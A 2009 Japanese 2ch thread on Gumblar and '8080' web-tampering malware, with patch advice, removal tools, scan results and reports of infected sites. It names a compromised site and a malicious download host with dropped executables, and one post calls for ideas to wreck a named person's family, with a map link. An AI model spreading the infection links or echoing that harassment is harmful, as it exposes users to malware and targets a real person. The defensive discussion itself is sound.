【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加しているようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(/*GNU GPL*/ や /*CODE1*/)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***

【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
2名無しさん@お腹いっぱい。:2009/12/27(日) 04:21:08
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
 ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
3名無しさん@お腹いっぱい。:2009/12/27(日) 04:21:48
【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/
4名無しさん@お腹いっぱい。:2009/12/27(日) 04:23:10
【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
5名無しさん@お腹いっぱい。:2009/12/27(日) 04:24:11
【8080系ウイルスについて】
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*GNU GPL*/
または
<script>/*CODE1*/
から始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を利用していますが
こちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
6名無しさん@お腹いっぱい。:2009/12/27(日) 04:25:02
●IPA 情報処理推進機構
Windowsの自動実行(オートラン)機能を無効にする ※USBメモリの使用に関わらず必ず設定しておくこと!
ttp://www.ipa.go.jp/security/txt/2009/05outline.html

・Microsoft Updateは確実に適用しましょう (*「カスタム」選択更新で適用にエラーが無いか?は確認出来ます)
・ブラウザの「インターネットゾーン」のセキュリティ設定項目は、自分でよく理解して管理しておきましょう
 感染するとブラウザ設定を低下させたり、悪意のあるサイトURLを信頼済みサイトへ登録するスパイウェアも存在します

・普段のブラウズは、サードパーティCookieをブロックする設定以上にしておけばスパイウェア予防にもなります
・「アドオンの管理」から、普段ブラウザで読み込まれるアドオン(Webブラウザ拡張機能)の内容は把握しておきましょう
・ソフトウェアやブラウザ(Webプラグイン類も)の最新版Updateとセキュリティ設定を常に心掛けましょう
 (*Adobeソフト、動画Player、圧縮解凍ソフト、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど)
 (*普段、使わないようなWebプラグイン類はアンインストールしておきましょう → 必要時だけ最新版を使用する)

・インターネット上の「無料で配布されているモノ」は、基本的には“疑って”下さい (*VirusTotal.comスキャンを活用)
・怪しいメールや圧縮ファイルは、絶対に開かないようにしましょう (*危険な餌に釣られない用心を持ちましょう)
・週に何回かは、Nortonで「システムの完全スキャン」を実行しましょう
・スキャンでリスクが検出された場合、駆除と同時にSymantecのサイトでリスクによる「被害内容」を確認しましょう
・「タスクマネージャーの常駐プロセスexe」の内容も把握しておきましょう
・Windowsの付加的「サービス」は、攻撃の侵入経路に利用されることもあるので脆弱性となる項目は停止しておきましょう
・大事なIDやパスワードの自己管理には十分に注意しましょう (*IDセーフ機能も活用)

●Webサイトの脆弱性、IPAから指摘しても6割が対応未完了 2009/7/24
サイト運営者やDNSサーバー管理者、Webアプリケーションの開発者に対して脆弱性の確認と対策の実施を求めている
ttp://internet.watch.impress.co.jp/docs/news/20090724_304366.html
7名無しさん@お腹いっぱい。:2009/12/27(日) 04:25:21
*** テンプレ終了 ***

抜け、間違いがあれば指摘よろ
81:2009/12/27(日) 04:26:14
ごめん続けて
9名無しさん@お腹いっぱい。:2009/12/27(日) 04:26:15
Norton +α Defense (Method of JAPAN Norton Forum)

・「a-squared Free 4.5」 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *日本語インターフェイス )
  ttp://www.emsisoft.com/en/software/free/
  サービス > 「a-squared Free Service」を無効 > 停止 > 適用で「自動Update常駐 a2service.exe」の停止=手動Update
・「a-square MalAware 1.0」 クラウドスキャナ (*クイッククラウドチェック、a-squared Freeとの併用がベストです)
  *インストール不要 *頻繁にプログラムアップデートしているので都度ダウンロードして試してみて下さい
  ttp://www.emsisoft.com/en/software/malaware//ttp://i46.tinypic.com/2gtnn2x.jpg

・「Malwarebytes' Anti-Malware 1.42」 ウイルス・スパイウェアのスキャンと駆除 (*常駐保護は無し *手動Update)
  ttp://www.malwarebytes.org/mbam.php (*「Protection」ページの機能はNortonとの共存の為に設定しないで下さい)

・「ReducedPermissions」 (手動Windows Updateやオンラインスキャンはエラーに *導入時には「ブロックの解除」設定を)
・「Spyware Blaster 4.2」 危険サイトの制限、危険ActiveXの実行制限処置 (*手動Update *Flash Killer機能も実用的です)

・「Live OneCare PC セーフティ (オンラインスキャン *駆除も可能 *月1・2回程度のチェックでOK)」
  ttp://onecare.live.com/site/ja-jp/default.htm?s_cid=sah
・「a-squared HiJackFree 3.1」 ttp://www.hijackfree.com/en/ (*詳細な自己診断ビューア *日本語インターフェイス)
  (*インストール後、歯車アイコンから一度アップデート → その後はオフでOK ttp://i45.tinypic.com/3022nwz.jpg
)
10名無しさん@お腹いっぱい。:2009/12/27(日) 04:26:56
■詐欺・罠サイトURLの報告 - Symantec Security Response 〔Report Suspected Phishing Sites〕
https://submit.symantec.com/antifraud/phish.cgi (記入例 ttp://i38.tinypic.com/k1xhjm.jpg

 *ワンクリック詐欺や詐欺ソフトのダウンロードを仕向けるURLの報告(*複数の場合はenter moreで報告枠追加できます)
 *インターネット中に、奇妙な動作を感じたページや、悪意のある動画やゲーム系サイトの報告もOK
 *思わぬサイトへ飛ばされた場合などは、リンク元ボタンを右クリック > プロパティでURL確認

■未対応リスクや疑わしいファイルを検疫経由でSymantecへ送信 (*最大10MB以下?までのサイズ)
タスクトレーのNortonアイコンを右クリック「最近の履歴を表示」 > 「検疫」を選択
検疫に追加 (*明らかに未対応リスクである場合は、「ディスクからファイルを削除」にチェック(=検疫と同時に削除))
検疫後、「詳細」 > 下列にある「処理」 > 「Symantecへ提出」をクリック
■疑わしいファイルの提出 - Symantec Security Response 〔Upload a suspected infected file〕
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポートで調査依頼の提出が出来ます
https://submit.symantec.com/websubmit/retail.cgi (記入例 ttp://i36.tinypic.com/bhj8ye.jpg


■Nortonが誤検出してしまうファイルの報告 - Symantec Security Response 〔False Positive Submission〕
https://submit.symantec.com/dispute/false_positive/ (記入例 ttp://i38.tinypic.com/2itmwjs.jpg


●JVN iPedia -脆弱性対策情報データベース (*使用しているソフトウェアの最新版への更新を心掛けましょう)
「脆弱性」とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所(ウィークポイント)です
ttp://jvn.jp/report/index.html
■「ttp://www.virustotal.com/jp/」 (37社のファイルスキャンサービス *圧縮ファイルの状態でもOK)
■「ttp://onlinelinkscan.com」 (4種類のサイト安全性チェックを一度に PhisTank ,AVG ,SiteTruth ,Google Safe Browsing)
■「ttp://www.gred.jp(セキュアブレイン gred)」 (国産サイト安全性チェックサービス … ワンクリ詐欺 ,Web攻撃の有無など)
11名無しさん@お腹いっぱい。:2009/12/27(日) 04:27:38
「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
ttp://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
ttp://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
ttp://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
 Social Network Service = さまざまな参加呼びかけ型コミュニケーションサイト
ttp://www.computerworld.jp/topics/vs/163829.html
個人情報をさらすマルウェア、ポルノゲームのインストールファイルを装って流通している 2009/11/30
ttp://www.itmedia.co.jp/enterprise/articles/0911/30/news010.html
ワンクリック不正請求トラブル、相談事例が半年で1万7794件 2009/12/4
ttp://internet.watch.impress.co.jp/docs/news/20091204_333169.html
Gumblar被害拡大中(3) 予防対策:一般ユーザーの方、サイト管理者の方へ 2009/12/11
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
12◇テンプレここまで:2009/12/27(日) 04:29:25

*** テンプレ終了 ***
13名無しさん@お腹いっぱい。:2009/12/27(日) 04:30:48
いきなり荒らし?
>>9-11ってノートンスレのテンプレであって関係ないよな?
14名無しさん@お腹いっぱい。:2009/12/27(日) 05:23:44
「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
ttp://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
ttp://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
ttp://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
ttp://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
Social Network Service:さまざまな参加呼びかけ型コミュニケーションサイト
ttp://www.computerworld.jp/topics/vs/163829.html
セキュアブレインが、「Gumblerウイルス」と類似した新たな攻撃手法を確認 2009/10/23
企業に「gredセキュリティサービス 無償トライアル版」を利用し、自社ウェブサイトの検査を行うよう呼びかけ
ttp://antivirus-news.net/2009/10/gumbler.html
迷惑メールからあなたを守るためのチェックリスト 2009/11/10
tp://japan.zdnet.com/news/sec/story/0,2000056194,20403268,00.htm
15名無しさん@お腹いっぱい。:2009/12/27(日) 05:24:56
「漫画・イラストも児童ポルノ規制対象に」約9割──内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
http://www.itmedia.co.jp/news/articles/0710/25/news140.html
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20090220nt0f.htm
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク 2009/05/25
http://itpro.nikkeibp.co.jp/article/NEWS/20090525/330580/
米IBMは2009年上半期のセキュリティ動向を報告し、Webを通じた脅威がかつてないほど危険な状態にあると警告 2009/08/27
http://www.itmedia.co.jp/enterprise/articles/0908/27/news080.html
「OSよりもアプリケーションが狙われる」、セキュリティ組織が警告 2009/9/16
Adobe ReaderやFlash Playerなどの脆弱性が危ない、「すぐに解消を」
http://pc.nikkeibp.co.jp/article/news/20090916/1018638/
米連邦捜査局(FBI)が、SNSを舞台にした犯罪が増えていると注意を呼びかけ 2009/10/2
Social Network Service:さまざまな参加呼びかけ型コミュニケーションサイト
http://www.computerworld.jp/topics/vs/163829.html
ネット検索は信用できない? ユーザー詐称する広告代理店を処罰 2009/10/28
盗んだ個人情報で4900個ものアカウントを作り、一般ユーザーのふりをして「ここがよかったよ〜」と、
特定のお店やWebサイトの宣伝をしていた。つまり、私達が利用したのは知識検索ではなく広告検索だった
ttp://pc.nikkeibp.co.jp/article/column/20091028/1019904/
ミクシィ、4200人情報"露出"…ゲーム課金不具合 2009/11/04
実際に制作・運営しているのは中国のゲーム会社「リクー・メディア」
ttp://www.yomiuri.co.jp/net/security/ryusyutsu/20091104-OYT8T00323.htm
16名無しさん@お腹いっぱい。:2009/12/27(日) 05:28:46
【ヤフオク】Nortonキー出品まとめA・悪い評価
■fantastic_kids_1999
特別に提供されたものを使用したが使えなかった。代替えとおまけで他の出品も提供されたがそれも使えなかった。
結局何も使えなかった。こんなやつの出品は所詮こんなもんでしょう。 (評価日時:2009年 6月 13日 15時 11分)
■intelli2009
プロダクトキーが使えなくなり、有効期間も0日に…詐欺でしょうか?(評価日時:2009年 9月 17日 7時 03分)
■number2009livecn(停止中)
期限切れ (評価日時:2009年 11月 5日 11時 08分)
■uxk1216
落札当初、2年間の有効期限と説明を受けていたが、3ヶ月目で更新期限切れが来てしまいました、
どういう事でしょうか? (評価日時:2009年 10月 25日 22時 24分)
■min9763557(停止中)
購入時は認証できましたが、3ヶ月もせず期限切れになりました。許せません。 (評価日時:2009年 11月 12日 17時 29分)
■yuanchong525
こいつはすぐに期限が切れるものを売りつけてます。詐欺です。
まあ騙された自分が馬鹿だったんですけど、みなさんも気をつけてください。(評価日時:2009年 9月 13日 22時 49分)
■seven_stars_king2000
Yahoo! JAPAN IDが無効です。
■andriy_shevchenko1976929
Yahoo! JAPAN IDが無効です。
■bottega_choice(停止中)
落札、代金支払後に取引停止となり、メール送信しても連絡無く、最悪です。 (評価日時:2009年 10月 20日 17時 03分)
■wxk1216(停止中)
海賊版でした。7日後に期限切れになりました。サポートも不可 (評価日時:2009年 10月 7日 21時 41分)
17名無しさん@お腹いっぱい。:2009/12/27(日) 05:34:27
            ____
   n      /⌒  ⌒\
   | |    /( >)  (<)\
  i「|^|^ト、/::::::⌒(__人__)⌒::::\ >>1乙だお!
 |: ::  ! } |    /| | | | |      |
  ヽ  ,イ \  (、`ー―'´,    /
18名無しさん@お腹いっぱい。:2009/12/27(日) 10:39:45
いきなり嵐にはわろうた
19名無しさん@お腹いっぱい。:2009/12/27(日) 10:41:55
あかかげまるの家庭を壊す案を広く募集いたしております。
http://www014.upp.so-net.ne.jp/BANBI/png/top.png
ちなみに地図はこちらです。
http://www.mapion.co.jp/m/34.6591819444444_135.453802777778_9/
20名無しさん@お腹いっぱい。:2009/12/27(日) 15:40:24
>>1

8080(/*GNU GPL*/ や /*CODE1*/)って
いまのところ検知するのノートンとAVASTだけなの?
他のソフトはスキャンでもスルー?
21名無しさん@お腹いっぱい。:2009/12/27(日) 15:57:14
>>20
カスペも検知する。
22名無しさん@お腹いっぱい。:2009/12/27(日) 16:04:28
>>21
(/*GNU GPL)踏んでカスペオンラインチェックで出てこなかったってどっかで見たけど
23名無しさん@お腹いっぱい。:2009/12/27(日) 16:12:49
8080系で>>4みたいな感染確認は無いですかね?
24名無しさん@お腹いっぱい。:2009/12/27(日) 16:19:57
スクリプトをいくつか踏んでみたけど、どうもまちまちみたい
定義ファイルの結果だから実際はもう少し検出するだろうけど
日付はindex.htmlのもの

/*GNU GPL*/
24日 結果: 7/41
ttp://www.virustotal.com/jp/analisis/c2c5b1338529ba08848f0f25c4e8119d52e7dfcab3358b55619e38232f8af827-1261897615
26日 結果: 0/41
ttp://www.virustotal.com/jp/analisis/bbb1b07545f46b6310ef1d8508e31437531a89a58e0cf263590bc4bce8ae68b9-1261896683

/*CODE1*/
22日 結果: 9/41
ttp://www.virustotal.com/jp/analisis/30bd85a231595bbee6fad3b8fa1b1931d6851c6187ca0f55d61a51b07975d38a-1261896524
25名無しさん@お腹いっぱい。:2009/12/27(日) 16:45:21
>>23
一例としてsiszyd32.exeをスタートアップに登録するみたいだ
もっともこれが他のウイルスを呼び込むから
感染してたらどうなっているやら・・・

ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
ttp://htlogs.com/what-is-siszyd32-exe-how-to-remove-siszyd32-exe/
26名無しさん@お腹いっぱい。:2009/12/27(日) 16:47:56
感染の疑いがある場合はAvastとか検出報告のあるソフトで試してみるしか確認も出来ないってことですか?
ポートチェッカーで80や8080が解放されてるものの応答は無し判定だったんですが
やはり黒でしょうか
27名無しさん@お腹いっぱい。:2009/12/27(日) 17:14:33
>>26
avast!は比較的スクリプトには反応するが
ウイルス本体を検出するかは検体を持っていないから分からない
個人的な印象になるが、ウイルス名やファイル名でググって見ると
本体の検出はKaspersky・Microsoft・Symantecあたりが強そうかな?

PCに詳しくないなら
ウイルス対策ソフトでフルスキャンをかけていろいろ検出したら
クリーンインストールが無難だろうな
2826:2009/12/27(日) 17:32:24
>>27
そうですか・・・
一応常駐インスコしてあるマカフィーでフルスキャン、カスペオンラインでスキャン
トロイスレに貼ってあったトロイスキャナーでオンラインスキャンして
何一つ検出されませんでした
(トロイスキャナーで有害度の低いクッキーがちょろっと出てきたのみ)
siszyd32.exeも出てこずMSアップデートも問題なく、再起動も出来てるのですが
これはもう白なんですかね
一日経過しましたが、いまのところプロセスにおかしな挙動をしているものは見当りません

確かに踏んだサイトには/*GNU GPL*/ のスクリプトが挿入されてたようなんですが
29名無しさん@お腹いっぱい。:2009/12/27(日) 17:35:36
あ、あとsymantecのポートチェックもやりましたがこっちは全部白でした
(8080系のポートはチェック対象外のようでした)
30名無しさん@お腹いっぱい。:2009/12/27(日) 18:11:36
>>28
それだけスキャンしてクッキーくらいなら白、なんだろうな
どういう経緯で感染したと思ったのかが分からないが
サイト踏んだと同時にアンチウイルスが反応したんなら
水際で阻止しているだろうし、アップデートで対策されてたら問題ないはず
31名無しさん@お腹いっぱい。:2009/12/27(日) 18:43:17
>>30
いえ、あっちのスレこっちで黒判定されてるサイトを迂闊に踏んでしまって
(偶然すぐに閉じてはいたのですが、マカフィーは無反応
その時は感染サイトだとは気付かず)
感染サイトだと知ってから携帯で該当サイトをもう一度踏んでみて、サイトの最下部に/*GNU GPL*/ を含む
恐らく難読化されたスクリプトが挿入されてるのを見まして

ちなみに踏んだのはGENOスレ290注意喚起されてたサイトなのですが、現在ではスクリプト部分は削除されているようで
今となっては再びの確認が取れません

IEでJAVAスクオンで踏んだんですが、何故生き残ったのか・・・
生き残ったのなら幸いですが、定義ファイルが追いついていないだけだとすると怖いものがあります
とりあえず様子見してみます。ありがとうございました
32名無しさん@お腹いっぱい。:2009/12/28(月) 00:17:17
>>24
ノートンは実際にサイトに訪問したとき反応する
virustotalでスクリプトの部分をスキャンしても反応しない
33名無しさん@お腹いっぱい。:2009/12/28(月) 00:27:56
つまり一度感染したらAVAST以外で確かめる術がないってこと?
でもAVASTも誤検出騒ぎで落ち着かないよな
どうすりゃいいんだ
3432:2009/12/28(月) 00:38:53
>>33
感染後のことは知らない
あくまでもスクリプトのスキャンの話
35名無しさん@お腹いっぱい。:2009/12/28(月) 00:42:02
>>34
ああそうか、スマン読み違えてた
36名無しさん@お腹いっぱい。:2009/12/28(月) 00:44:32
>>33
どっかに書かれているだろうど
OSに最新のアップデートを適用しておく
Adobe製品やSunのJavaなどがインストールされていれば同様にアップデートしておく
Adobe ReaderはJavaScriptを切っておく

どうしても不安ならwebブラウザのJavaScriptを切っておけばほぼ無害
機種によるかも知れないがルーターで切ることも出来る
37名無しさん@お腹いっぱい。:2009/12/28(月) 00:45:56
>>36
いや感染(疑い)後の話よ
どのスキャンでも上がってこないらしいじゃん
38名無しさん@お腹いっぱい。:2009/12/28(月) 00:50:27
あとはHIPSの強力なファイアウォールなどのセキュリティ製品を使う
設定もよりきつめにすれば思わぬマルウェアの実行やファイルやレジストリの書き換えも防げる
確証はないがほぼ防げるんじゃないだろうか
Outpost、Comodo、Online Armor、PC toolsなど
39名無しさん@お腹いっぱい。:2009/12/28(月) 00:52:47
>>37
感染後はどうなるのかと言う情報ある?
40名無しさん@お腹いっぱい。:2009/12/28(月) 00:54:28
>>37
そこまで心配する人なら、疑いのあるサイト行ってしまった自覚があるならOSごとクリーンインスコが精神上一番良いと思う
日々コードも引き連れてくるマルウェアも変化してるものに、どこのベンダーのものが100%検知可能!とか言えない
GumblarなんてHijackThisでも見つけにくいとか報告あったし
41名無しさん@お腹いっぱい。:2009/12/28(月) 00:56:23
あと肝心なことは
感染してもすぐに復旧できるようにバックアップを取っておく
42名無しさん@お腹いっぱい。:2009/12/28(月) 00:57:48
>>39
ない
踏んだって話は色々見かけるが、どうなったっていうレスを見ない
誰か実際やった奴いないんだろうか
43名無しさん@お腹いっぱい。:2009/12/28(月) 01:01:23
8080系はいわゆるダウンローダーで
次々にウイルスをダウンロードしては実行するので
感染したが最後、収拾がつかなくなるはず

だからダウンローダーを削除しても他のウイルスに
感染している可能性が高い
ある意味Gumblarよりたちが悪い

ここの下あたりに動作が記載されてる
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
44名無しさん@お腹いっぱい。:2009/12/28(月) 01:02:38
webサイトを管理してるなら
パスワードを変更するのも忘れずに

感染しても今のところweb改竄の被害を受けるだけなのかな
俺がはやりのGNU GPLのスクリプト試したときはpdfup.exeと言うのが落ちてきただけだったな
45名無しさん@お腹いっぱい。:2009/12/28(月) 01:10:34
view-source:http://digimaga.net/

<script>/*GNU GPL*/・・

デジマガ、アウト。
46名無しさん@お腹いっぱい。:2009/12/28(月) 01:10:34
試す環境がある人でも2回目のアクセスの時は404返すようになったりと素晴らしい工夫がなされてたりして
検証しにくかったりするんだよな
俺は仮想環境とかないのでやったことないけど・・・・


>>44
パスワード変更するのは良いが、感染してないって言い切れる環境でのパスワード変更ってのが必須だな
感染してる環境からパスワード変更はまったく意味ないしw

8080系の奴ってSo-netの記事によると、改竄だけじゃ済まないみたいよ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2104
>ちなみに、攻撃成立時に実行されるウイルス本体は、「Bredolab」や「HDrop」で検出されたり、汎用名で検出されたり、検出できなかったりと、こちらも微妙だ。
>困ったことに、このウイルスは他の不正なプログラムをダウンロード・実行するのが主な役目で、実行時にシステムに何がインストールされたかがわからない。
>情報を盗み取るスパイウェアやパスワードスティーラ―、外部からパソコンを操るためのボット、偽ウイルス対策ソフトなど、これまでに様々な脅威をインストールして来た系列のウイルスだ。
47名無しさん@お腹いっぱい。:2009/12/28(月) 01:12:08
>>45
志村ー、URLURL
48名無しさん@お腹いっぱい。:2009/12/28(月) 01:13:04
>>45
貼っちまったよ・・。
対策ない奴は、絶対開くなよ。
49名無しさん@お腹いっぱい。:2009/12/28(月) 01:14:32
>>46
分からないって書いてあるじゃん
分かってないのか分かってないのか微妙な文章だが
50名無しさん@お腹いっぱい。:2009/12/28(月) 01:15:42
分かってないのか分かってるのか微妙な文章だw
最後はこういうウイルスの一般的な動作を述べてるだけじゃないか
5146:2009/12/28(月) 01:17:22
レスした後再度読み直してみたら、微妙な文章ですね・・・
まあでも、最悪こういう自体になりかねないよって言う脅しには良いんじゃないかと・・・
52名無しさん@お腹いっぱい。:2009/12/28(月) 01:29:27
>>45
JR東日本のサイト改ざん。『/*GNU GPL*/』の不正なJavaScriptコード
http://blogs.yahoo.co.jp/noooo_spam/59306006.html

コレと一緒っぽいな。
53名無しさん@お腹いっぱい。:2009/12/28(月) 01:30:41
万一に備えてシステムをバックアップ
True Imageなどのシステムをバックアップするソフトがない場合

お薦めフリーソフト

Paragon Backup & Recovery 10 Free Edition
http://www.paragon-software.com/home/db-express/index.html
起動メディアを作っておけば起動メディアから復元はもちろんバックアップも出来る

Macrium Reflect FREE Edition
http://www.macrium.com/ReflectFree.asp

EASEUS Todo Backup
http://www.todo-backup.com/
54名無しさん@お腹いっぱい。:2009/12/28(月) 01:33:13
たしかアニたまのサイトもそれだった気がするんだが
あんまり大きな騒ぎにはならなかったよな
潜伏してるのが多いのか?
55名無しさん@お腹いっぱい。:2009/12/28(月) 01:38:04
今騒ぎになってきてるじゃないですか。ゼロデイ突いてくるドライブバイダウンロードが有名サイトにぞくぞくとってことで
56名無しさん@お腹いっぱい。:2009/12/28(月) 01:41:11
adobeもjavascriptとか最初から危なっかしいの分かるような機能入れるなよ
ちゃんと対応できるならまだしも全然駄目じゃないか
アホすぎ
57名無しさん@お腹いっぱい。:2009/12/28(月) 01:45:29
>>45
セーフだろうが。嘘を書くなよ
58名無しさん@お腹いっぱい。:2009/12/28(月) 01:47:36
>>57
まさか、ウィルススキャンでチェックしてスルーしたからセーフとか言ってないよな?
59名無しさん@お腹いっぱい。:2009/12/28(月) 01:48:31
ね、URLそのまま晒すとこんな奴出てくるでしょ。>>57
晒すときは>>1をよく読もう
>*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***

>>56
そしてその危なっかしいものを有効活用しているところがあるという・・・
ttp://slashdot.jp/security/comments.pl?sid=441912&threshold=1&commentsort=3&mode=thread&pid=1526692#1526854
60名無しさん@お腹いっぱい。:2009/12/28(月) 01:51:09
>>58
自己レス
http://digimaga●net/

開くと、JREが起動して、アクセスに行こうとするな。ロシアのサイト。
61名無しさん@お腹いっぱい。:2009/12/28(月) 01:51:33
デジマガ/*GNU GPL*/あるな
で、>>57は踏んだのか? どうなった?
62名無しさん@お腹いっぱい。:2009/12/28(月) 01:56:24
>>61
ここに行こうとしてるな。
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080

やられてるだろ。これ。
63名無しさん@お腹いっぱい。:2009/12/28(月) 01:58:05
>>61
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
ここに向けてリクエスト出してんぞ。

まぁ確実かな。
64名無しさん@お腹いっぱい。:2009/12/28(月) 01:58:54
pdfupd.exeが落ちてくる
virustotalではどれも検出しない
65名無しさん@お腹いっぱい。:2009/12/28(月) 02:00:47
>>62-63
普通踏んだら速攻で(この場合はロシアから)何か運んでくるものなの?
初心者でゴメン
なんかファイルができたとか、そういう話は今回あまり聞かないよね
66名無しさん@お腹いっぱい。:2009/12/28(月) 02:03:27
pdfupd.exeを実行する何かダウンロードして
_ex-68.exeを実行しようとするのでこの辺でやめといた
67名無しさん@お腹いっぱい。:2009/12/28(月) 02:05:29
>>65
いかにユーザーに感染したのが分からないように感染させるのかがマルウェア制作者の腕の見せ所
68名無しさん@お腹いっぱい。:2009/12/28(月) 02:09:32
>>64.66
どうもありがとう。踏んでてpdfupd.exeが隠しファイル含めて上がってこなかったらセーフかな
